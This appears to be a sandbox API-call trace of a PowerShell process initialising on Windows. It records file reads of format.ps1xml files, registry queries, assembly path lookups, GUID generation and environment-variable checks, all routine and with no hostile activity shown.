	[0040.389] VirtualQuery (in: lpAddress=0x25d150, lpBuffer=0x25e150, dwLength=0x1c | out: lpBuffer=0x25e150*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.390] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x7ba900c8, Data2=0xf227, Data3=0x4c18, Data4=([0]=0x89, [1]=0x59, [2]=0x0, [3]=0x1, [4]=0x92, [5]=0x2d, [6]=0x79, [7]=0xf6))) returned 0x0
	[0040.390] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x246cbe6c, Data2=0x2e4a, Data3=0x4d86, Data4=([0]=0xba, [1]=0x7b, [2]=0xa1, [3]=0x52, [4]=0x2f, [5]=0x5c, [6]=0x9d, [7]=0xb5))) returned 0x0
	[0040.390] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x6429b6f2, Data2=0xd549, Data3=0x4ece, Data4=([0]=0x93, [1]=0xec, [2]=0xb7, [3]=0xa3, [4]=0xfc, [5]=0xf8, [6]=0xb1, [7]=0xf0))) returned 0x0
	[0040.391] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x5ea6a0a0, Data2=0xea5f, Data3=0x48c2, Data4=([0]=0x9e, [1]=0x39, [2]=0xf5, [3]=0xc1, [4]=0x91, [5]=0x16, [6]=0x9c, [7]=0xc4))) returned 0x0
	[0040.391] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xd969834b, Data2=0xe81b, Data3=0x4361, Data4=([0]=0xb3, [1]=0xc7, [2]=0x63, [3]=0xa6, [4]=0xc7, [5]=0x51, [6]=0xef, [7]=0x62))) returned 0x0
	[0040.391] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x97e94fee, Data2=0x53cd, Data3=0x4d56, Data4=([0]=0x9b, [1]=0x0, [2]=0x3a, [3]=0xdb, [4]=0x19, [5]=0x25, [6]=0x10, [7]=0x85))) returned 0x0
	[0040.391] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x41479ab9, Data2=0x326f, Data3=0x4647, Data4=([0]=0xae, [1]=0x21, [2]=0x3d, [3]=0x60, [4]=0xa3, [5]=0xb7, [6]=0x28, [7]=0xfb))) returned 0x0
	[0040.392] VirtualQuery (in: lpAddress=0x25d130, lpBuffer=0x25e130, dwLength=0x1c | out: lpBuffer=0x25e130*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.393] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x1a957e9c, Data2=0x87cc, Data3=0x4de3, Data4=([0]=0xa5, [1]=0xd7, [2]=0xda, [3]=0xa1, [4]=0x8f, [5]=0x4f, [6]=0x29, [7]=0xbf))) returned 0x0
	[0040.393] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x39387196, Data2=0x553a, Data3=0x45ce, Data4=([0]=0xa3, [1]=0x68, [2]=0xe8, [3]=0xd, [4]=0x65, [5]=0x1c, [6]=0xb2, [7]=0x6))) returned 0x0
	[0040.393] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x9397723a, Data2=0xf2f7, Data3=0x405f, Data4=([0]=0xab, [1]=0x80, [2]=0x66, [3]=0x38, [4]=0x95, [5]=0x97, [6]=0x6e, [7]=0x84))) returned 0x0
	[0040.394] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x4acb016a, Data2=0x2eb2, Data3=0x4f28, Data4=([0]=0xa7, [1]=0x2b, [2]=0xcc, [3]=0x3e, [4]=0x34, [5]=0xd4, [6]=0xc5, [7]=0x24))) returned 0x0
	[0040.394] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x3619f741, Data2=0x579b, Data3=0x4350, Data4=([0]=0xb9, [1]=0x6f, [2]=0x96, [3]=0xf4, [4]=0x2d, [5]=0xa2, [6]=0x8f, [7]=0x85))) returned 0x0
	[0040.394] VirtualQuery (in: lpAddress=0x25d130, lpBuffer=0x25e130, dwLength=0x1c | out: lpBuffer=0x25e130*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.394] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x7f00c9a6, Data2=0xdd7d, Data3=0x46b3, Data4=([0]=0x9a, [1]=0x0, [2]=0xcd, [3]=0xcb, [4]=0x45, [5]=0xf, [6]=0x7e, [7]=0x6b))) returned 0x0
	[0040.395] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x8dc56ae7, Data2=0x2cdb, Data3=0x46a5, Data4=([0]=0xb7, [1]=0x8d, [2]=0xfc, [3]=0x7e, [4]=0xc9, [5]=0x59, [6]=0xc8, [7]=0xd6))) returned 0x0
	[0040.395] VirtualQuery (in: lpAddress=0x25d158, lpBuffer=0x25e158, dwLength=0x1c | out: lpBuffer=0x25e158*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.395] VirtualQuery (in: lpAddress=0x25d158, lpBuffer=0x25e158, dwLength=0x1c | out: lpBuffer=0x25e158*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.395] VirtualQuery (in: lpAddress=0x25d158, lpBuffer=0x25e158, dwLength=0x1c | out: lpBuffer=0x25e158*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.396] VirtualQuery (in: lpAddress=0x25d158, lpBuffer=0x25e158, dwLength=0x1c | out: lpBuffer=0x25e158*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0040.396] GetLastError () returned 0x0
	[0040.396] SetErrorMode (uMode=0x1) returned 0x1
	[0040.396] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0040.396] GetLastError () returned 0x0
	[0040.396] GetFileType (hFile=0x300) returned 0x1
	[0040.397] SetErrorMode (uMode=0x1) returned 0x1
	[0040.397] GetFileType (hFile=0x300) returned 0x1
	[0040.397] ReadFile (in: hFile=0x300, lpBuffer=0x297d96c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x297d96c*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.399] GetLastError () returned 0x0
	[0040.399] ReadFile (in: hFile=0x300, lpBuffer=0x297d96c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x297d96c*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.399] GetLastError () returned 0x0
	[0040.400] ReadFile (in: hFile=0x300, lpBuffer=0x297d96c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x297d96c*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.400] GetLastError () returned 0x0
	[0040.400] ReadFile (in: hFile=0x300, lpBuffer=0x297d96c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x297d96c*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.400] GetLastError () returned 0x0
	[0040.401] ReadFile (in: hFile=0x300, lpBuffer=0x297d96c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x297d96c*, lpNumberOfBytesRead=0x25e404*=0x8b4, lpOverlapped=0x0) returned 1
	[0040.401] GetLastError () returned 0x0
	[0040.401] ReadFile (in: hFile=0x300, lpBuffer=0x297cdc0, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x297cdc0*, lpNumberOfBytesRead=0x25e404*=0x0, lpOverlapped=0x0) returned 1
	[0040.402] GetLastError () returned 0x0
	[0040.402] ReadFile (in: hFile=0x300, lpBuffer=0x297d96c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x297d96c*, lpNumberOfBytesRead=0x25e404*=0x0, lpOverlapped=0x0) returned 1
	[0040.402] GetLastError () returned 0x0
	[0040.402] CloseHandle (hObject=0x300) returned 1
	[0040.402] GetLastError () returned 0x0
	[0040.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25df64, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0040.402] GetLastError () returned 0x0
	[0040.402] SetErrorMode (uMode=0x1) returned 0x1
	[0040.402] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x299e968 | out: lpFileInformation=0x299e968*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0040.402] GetLastError () returned 0x0
	[0040.402] SetErrorMode (uMode=0x1) returned 0x1
	[0040.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25df30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0040.402] GetLastError () returned 0x0
	[0040.402] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e388 | out: phkResult=0x25e388*=0x300) returned 0x0
	[0040.402] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e3d0, lpData=0x0, lpcbData=0x25e3cc*=0x0 | out: lpType=0x25e3d0*=0x1, lpData=0x0, lpcbData=0x25e3cc*=0x56) returned 0x0
	[0040.402] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e3d0, lpData=0x190b58, lpcbData=0x25e3cc*=0x56 | out: lpType=0x25e3d0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x25e3cc*=0x56) returned 0x0
	[0040.403] RegCloseKey (hKey=0x300) returned 0x0
	[0040.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25df30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0040.403] GetLastError () returned 0x0
	[0040.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25dec4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0040.403] GetLastError () returned 0x0
	[0040.404] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x7c4f01e7, Data2=0x9683, Data3=0x49ae, Data4=([0]=0xa9, [1]=0xbe, [2]=0xa3, [3]=0xd6, [4]=0x46, [5]=0x51, [6]=0xc3, [7]=0x63))) returned 0x0
	[0040.405] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x1edf68ed, Data2=0x84df, Data3=0x4371, Data4=([0]=0x8b, [1]=0x97, [2]=0x60, [3]=0x49, [4]=0x70, [5]=0xf9, [6]=0x2e, [7]=0x76))) returned 0x0
	[0040.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0040.405] GetLastError () returned 0x0
	[0040.405] SetErrorMode (uMode=0x1) returned 0x1
	[0040.405] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0040.405] GetLastError () returned 0x0
	[0040.405] GetFileType (hFile=0x300) returned 0x1
	[0040.405] SetErrorMode (uMode=0x1) returned 0x1
	[0040.405] GetFileType (hFile=0x300) returned 0x1
	[0040.406] ReadFile (in: hFile=0x300, lpBuffer=0x29b4878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x29b4878*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.407] GetLastError () returned 0x0
	[0040.408] ReadFile (in: hFile=0x300, lpBuffer=0x29b4878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x29b4878*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.408] GetLastError () returned 0x0
	[0040.408] ReadFile (in: hFile=0x300, lpBuffer=0x29b4878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x29b4878*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.408] GetLastError () returned 0x0
	[0040.408] ReadFile (in: hFile=0x300, lpBuffer=0x29b4878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x29b4878*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.408] GetLastError () returned 0x0
	[0040.409] ReadFile (in: hFile=0x300, lpBuffer=0x29b4878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x29b4878*, lpNumberOfBytesRead=0x25e404*=0xe98, lpOverlapped=0x0) returned 1
	[0040.409] GetLastError () returned 0x0
	[0040.409] ReadFile (in: hFile=0x300, lpBuffer=0x29b3eb0, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x29b3eb0*, lpNumberOfBytesRead=0x25e404*=0x0, lpOverlapped=0x0) returned 1
	[0040.409] GetLastError () returned 0x0
	[0040.409] ReadFile (in: hFile=0x300, lpBuffer=0x29b4878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x29b4878*, lpNumberOfBytesRead=0x25e404*=0x0, lpOverlapped=0x0) returned 1
	[0040.410] GetLastError () returned 0x0
	[0040.410] CloseHandle (hObject=0x300) returned 1
	[0040.410] GetLastError () returned 0x0
	[0040.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25df64, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0040.410] GetLastError () returned 0x0
	[0040.410] SetErrorMode (uMode=0x1) returned 0x1
	[0040.410] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x29d5874 | out: lpFileInformation=0x29d5874*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0040.410] GetLastError () returned 0x0
	[0040.410] SetErrorMode (uMode=0x1) returned 0x1
	[0040.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25df30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0040.410] GetLastError () returned 0x0
	[0040.410] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e388 | out: phkResult=0x25e388*=0x300) returned 0x0
	[0040.410] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e3d0, lpData=0x0, lpcbData=0x25e3cc*=0x0 | out: lpType=0x25e3d0*=0x1, lpData=0x0, lpcbData=0x25e3cc*=0x56) returned 0x0
	[0040.410] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e3d0, lpData=0x190b58, lpcbData=0x25e3cc*=0x56 | out: lpType=0x25e3d0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x25e3cc*=0x56) returned 0x0
	[0040.411] RegCloseKey (hKey=0x300) returned 0x0
	[0040.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25df30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0040.411] GetLastError () returned 0x0
	[0040.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25dec4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0040.411] GetLastError () returned 0x0
	[0040.412] VirtualQuery (in: lpAddress=0x25d0e0, lpBuffer=0x25e0e0, dwLength=0x1c | out: lpBuffer=0x25e0e0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.412] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xb05106, Data2=0x53ad, Data3=0x4398, Data4=([0]=0xa9, [1]=0x1f, [2]=0xa5, [3]=0x48, [4]=0x3c, [5]=0xa1, [6]=0xb3, [7]=0x1e))) returned 0x0
	[0040.413] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x1e83d158, Data2=0xf543, Data3=0x402d, Data4=([0]=0xa8, [1]=0x1b, [2]=0x92, [3]=0x96, [4]=0xf3, [5]=0xb2, [6]=0x49, [7]=0xf7))) returned 0x0
	[0040.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x25e0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0040.441] GetLastError () returned 0x57
	[0040.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x25e0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0040.441] GetLastError () returned 0x57
	[0040.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x25e0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0040.455] GetLastError () returned 0x57
	[0040.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x25e0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0040.456] GetLastError () returned 0x57
	[0040.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.470] GetLastError () returned 0x57
	[0040.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.470] GetLastError () returned 0x57
	[0040.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x25e0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0040.480] GetLastError () returned 0x57
	[0040.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x25e0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0040.481] GetLastError () returned 0x57
	[0040.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0040.492] GetLastError () returned 0x57
	[0040.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0040.492] GetLastError () returned 0x57
	[0040.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x25e0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0040.504] GetLastError () returned 0x57
	[0040.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x25e0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0040.504] GetLastError () returned 0x57
	[0040.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x25e0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0040.516] GetLastError () returned 0x57
	[0040.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x25e0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0040.516] GetLastError () returned 0x57
	[0040.551] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0040.551] GetLastError () returned 0xcb
	[0040.552] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
